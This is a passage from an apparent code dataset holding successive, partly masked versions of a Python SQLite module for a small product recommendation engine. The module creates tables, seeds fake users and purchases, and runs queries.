(NULL,?,?,?,?,?)'\n , (randint(1, 2000), catalogs[randint(0, len(catalogs) - 1)], \n 'Movie' + str(i), randint(1, 2000), 'Title' + str(i)))\n products.append(c.lastrowid)\n for i in range(1, 50):\n c.execute(\n 'INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)'\n , (ppl[randint(0, len(ppl) - 1)], products[randint(0, len(\n products) - 1)]))\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 5), randint(0, 30)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = products[randint(0, len(products) - 1)]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')\"\n , (ppl[randint(0, len(ppl) - 1)], product_id))\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n\n\n<mask token>\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('select * from users')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('select * from catalogs')\n return c.fetchall()\n\n\ndef get_products(conn, catalog_id):\n c = conn.cursor()\n c.execute('select * from products where catalog_id = ?', (catalog_id,))\n return c.fetchall()\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('SELECT * FROM products WHERE catalog_id = ? AND id = ?', (\n catalog_id, product_id))\n return c.fetchall()\n\n\ndef get_products_bought(conn, catalog_id):\n c = conn.cursor()\n c.execute(\n 'select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?'\n , (catalog_id,))\n return c.fetchall()\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id'\n )\n return c.fetchall()\n\n\ndef get_data_for_user(conn, userid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?'\n , (userid,))\n return c.fetchall()\n\n\ndef get_data_for_user_and_catalog(conn, userid, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? and c.id = ?'\n , (userid, catalogid))\n return c.fetchall()\n\n\n<mask token>\n\n\ndef get_recommendations_by_user(conn, userId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?'\n , (userId,))\n return c.fetchall()\n\n\ndef get_recommendations_by_product(conn, productId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?'\n , (productId,))\n return c.fetchall()\n\n\ndef get_connection():\n return sqlite3.connect('recommendation_engine.db')\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0,\n len(oses) - 1)], times[randint(0, len(times) - 1)], days[randint(0,\n len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[randint(0, \n len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\ndef add_recommendation(conn, product_ids, user_ids, contexts):\n ids = []\n c = conn.cursor()\n for i in range(0, len(product_ids)):\n product_id = product_ids[i]\n user_id = user_ids[i]\n context = contexts[i]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')\"\n , (user_id, product_id))\n context.insert(0, c.lastrowid)\n ids.append(c.lastrowid)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , context)\n conn.commit()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.id in (%s)'\n % ','.join('?' * len(ids)), ids)\n return c.fetchall()\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = 'select count(*) from product_context where '\n first = True\n params = []\n for key, val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n total = c.fetchone()[0]\n for key, val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller / float(total)\n\n\ndef load_test_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n user_names = test_data.USER_NAMES\n product_names = test_data.PRODUCT_NAMES\n prices = test_data.POSSIBLE_PRICES\n catalog_ids = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', (\n 'MovieDatabase',))\n catalog_ids.append(c.lastrowid)\n user_ids = []\n for user in user_names:\n c.execute('INSERT INTO users (user_name) VALUES (?)', (user,))\n user_ids.append(c.lastrowid)\n product_ids = []\n for product in product_names:\n values = randint(1, 2000), catalog_ids[0], product, prices[randint(\n 0, len(prices) - 1)], 'desc'\n c.execute(\n 'INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)'\n , values)\n product_ids.append(c.lastrowid)\n for i in range(1, 50):\n values = user_ids[randint(0, len(user_ids) - 1)], product_ids[randint\n (0, len(product_ids) - 1)]\n c.execute(\n 'INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)'\n , values)\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = product_ids[randint(0, len(product_ids) - 1)]\n values = user_ids[randint(0, len(user_ids) - 1)], product_id\n c.execute(\n \"INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')\"\n , values)\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n",
"step-3": "__author__ = 'tomer'\n<mask token>\n\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)\"\"\"\n )\n\n\ndef load_fake_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n catalogs = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('BestBuy',))\n catalogs.append(c.lastrowid)\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('RiteAid',))\n catalogs.append(c.lastrowid)\n ppl = []\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Tomer',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Alex',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Matt',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Rachael',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Sam',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Joey',))\n ppl.append(c.lastrowid)\n products = []\n for i in range(1, 20):\n c.execute(\n 'INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)'\n , (randint(1, 2000), catalogs[randint(0, len(catalogs) - 1)], \n 'Movie' + str(i), randint(1, 2000), 'Title' + str(i)))\n products.append(c.lastrowid)\n for i in range(1, 50):\n c.execute(\n 'INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)'\n , (ppl[randint(0, len(ppl) - 1)], products[randint(0, len(\n products) - 1)]))\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 5), randint(0, 30)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = products[randint(0, len(products) - 1)]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')\"\n , (ppl[randint(0, len(ppl) - 1)], product_id))\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n\n\noses = ['IOS', 'Android']\ndevice = ['mobile']\n<mask token>\ntimes = ['morning', 'afternoon', 'night']\ndays = ['M']\n<mask token>\nlats = ['north']\n<mask token>\nlons = ['east']\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('select * from users')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('select * from catalogs')\n return c.fetchall()\n\n\ndef get_products(conn, catalog_id):\n c = conn.cursor()\n c.execute('select * from products where catalog_id = ?', (catalog_id,))\n return c.fetchall()\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('SELECT * FROM products WHERE catalog_id = ? AND id = ?', (\n catalog_id, product_id))\n return c.fetchall()\n\n\ndef get_products_bought(conn, catalog_id):\n c = conn.cursor()\n c.execute(\n 'select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?'\n , (catalog_id,))\n return c.fetchall()\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id'\n )\n return c.fetchall()\n\n\ndef get_data_for_user(conn, userid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?'\n , (userid,))\n return c.fetchall()\n\n\ndef get_data_for_user_and_catalog(conn, userid, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? and c.id = ?'\n , (userid, catalogid))\n return c.fetchall()\n\n\ndef get_transactions_for_catalog(conn, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and c.id = ?'\n , (catalogid,))\n return c.fetchall()\n\n\ndef get_recommendations_by_user(conn, userId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?'\n , (userId,))\n return c.fetchall()\n\n\ndef get_recommendations_by_product(conn, productId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?'\n , (productId,))\n return c.fetchall()\n\n\ndef get_connection():\n return sqlite3.connect('recommendation_engine.db')\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0,\n len(oses) - 1)], times[randint(0, len(times) - 1)], days[randint(0,\n len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[randint(0, \n len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\ndef add_recommendation(conn, product_ids, user_ids, contexts):\n ids = []\n c = conn.cursor()\n for i in range(0, len(product_ids)):\n product_id = product_ids[i]\n user_id = user_ids[i]\n context = contexts[i]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')\"\n , (user_id, product_id))\n context.insert(0, c.lastrowid)\n ids.append(c.lastrowid)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , context)\n conn.commit()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.id in (%s)'\n % ','.join('?' * len(ids)), ids)\n return c.fetchall()\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = 'select count(*) from product_context where '\n first = True\n params = []\n for key, val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n total = c.fetchone()[0]\n for key, val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller / float(total)\n\n\ndef load_test_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n user_names = test_data.USER_NAMES\n product_names = test_data.PRODUCT_NAMES\n prices = test_data.POSSIBLE_PRICES\n catalog_ids = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', (\n 'MovieDatabase',))\n catalog_ids.append(c.lastrowid)\n user_ids = []\n for user in user_names:\n c.execute('INSERT INTO users (user_name) VALUES (?)', (user,))\n user_ids.append(c.lastrowid)\n product_ids = []\n for product in product_names:\n values = randint(1, 2000), catalog_ids[0], product, prices[randint(\n 0, len(prices) - 1)], 'desc'\n c.execute(\n 'INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)'\n , values)\n product_ids.append(c.lastrowid)\n for i in range(1, 50):\n values = user_ids[randint(0, len(user_ids) - 1)], product_ids[randint\n (0, len(product_ids) - 1)]\n c.execute(\n 'INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)'\n , values)\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = product_ids[randint(0, len(product_ids) - 1)]\n values = user_ids[randint(0, len(user_ids) - 1)], product_id\n c.execute(\n \"INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')\"\n , values)\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n",
"step-4": "__author__ = 'tomer'\nimport sqlite3\nfrom random import randint\nimport test_data\n\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)\"\"\"\n )\n\n\ndef load_fake_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n catalogs = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('BestBuy',))\n catalogs.append(c.lastrowid)\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('RiteAid',))\n catalogs.append(c.lastrowid)\n ppl = []\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Tomer',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Alex',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Matt',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Rachael',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Sam',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Joey',))\n ppl.append(c.lastrowid)\n products = []\n for i in range(1, 20):\n c.execute(\n 'INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)'\n , (randint(1, 2000), catalogs[randint(0, len(catalogs) - 1)], \n 'Movie' + str(i), randint(1, 2000), 'Title' + str(i)))\n products.append(c.lastrowid)\n for i in range(1, 50):\n c.execute(\n 'INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)'\n , (ppl[randint(0, len(ppl) - 1)], products[randint(0, len(\n products) - 1)]))\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 5), randint(0, 30)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = products[randint(0, len(products) - 1)]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')\"\n , (ppl[randint(0, len(ppl) - 1)], product_id))\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n\n\noses = ['IOS', 'Android']\ndevice = ['mobile']\n<mask token>\ntimes = ['morning', 'afternoon', 'night']\ndays = ['M']\n<mask token>\nlats = ['north']\n<mask token>\nlons = ['east']\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('select * from users')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('select * from catalogs')\n return c.fetchall()\n\n\ndef get_products(conn, catalog_id):\n c = conn.cursor()\n c.execute('select * from products where catalog_id = ?', (catalog_id,))\n return c.fetchall()\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('SELECT * FROM products WHERE catalog_id = ? AND id = ?', (\n catalog_id, product_id))\n return c.fetchall()\n\n\ndef get_products_bought(conn, catalog_id):\n c = conn.cursor()\n c.execute(\n 'select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?'\n , (catalog_id,))\n return c.fetchall()\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id'\n )\n return c.fetchall()\n\n\ndef get_data_for_user(conn, userid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?'\n , (userid,))\n return c.fetchall()\n\n\ndef get_data_for_user_and_catalog(conn, userid, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? and c.id = ?'\n , (userid, catalogid))\n return c.fetchall()\n\n\ndef get_transactions_for_catalog(conn, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and c.id = ?'\n , (catalogid,))\n return c.fetchall()\n\n\ndef get_recommendations_by_user(conn, userId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?'\n , (userId,))\n return c.fetchall()\n\n\ndef get_recommendations_by_product(conn, productId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?'\n , (productId,))\n return c.fetchall()\n\n\ndef get_connection():\n return sqlite3.connect('recommendation_engine.db')\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0,\n len(oses) - 1)], times[randint(0, len(times) - 1)], days[randint(0,\n len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[randint(0, \n len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\ndef add_recommendation(conn, product_ids, user_ids, contexts):\n ids = []\n c = conn.cursor()\n for i in range(0, len(product_ids)):\n product_id = product_ids[i]\n user_id = user_ids[i]\n context = contexts[i]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')\"\n , (user_id, product_id))\n context.insert(0, c.lastrowid)\n ids.append(c.lastrowid)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , context)\n conn.commit()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.id in (%s)'\n % ','.join('?' * len(ids)), ids)\n return c.fetchall()\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = 'select count(*) from product_context where '\n first = True\n params = []\n for key, val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n total = c.fetchone()[0]\n for key, val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller / float(total)\n\n\ndef load_test_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n user_names = test_data.USER_NAMES\n product_names = test_data.PRODUCT_NAMES\n prices = test_data.POSSIBLE_PRICES\n catalog_ids = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', (\n 'MovieDatabase',))\n catalog_ids.append(c.lastrowid)\n user_ids = []\n for user in user_names:\n c.execute('INSERT INTO users (user_name) VALUES (?)', (user,))\n user_ids.append(c.lastrowid)\n product_ids = []\n for product in product_names:\n values = randint(1, 2000), catalog_ids[0], product, prices[randint(\n 0, len(prices) - 1)], 'desc'\n c.execute(\n 'INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)'\n , values)\n product_ids.append(c.lastrowid)\n for i in range(1, 50):\n values = user_ids[randint(0, len(user_ids) - 1)], product_ids[randint\n (0, len(product_ids) - 1)]\n c.execute(\n 'INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)'\n , values)\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = product_ids[randint(0, len(product_ids) - 1)]\n values = user_ids[randint(0, len(user_ids) - 1)], product_id\n c.execute(\n \"INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')\"\n , values)\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n",
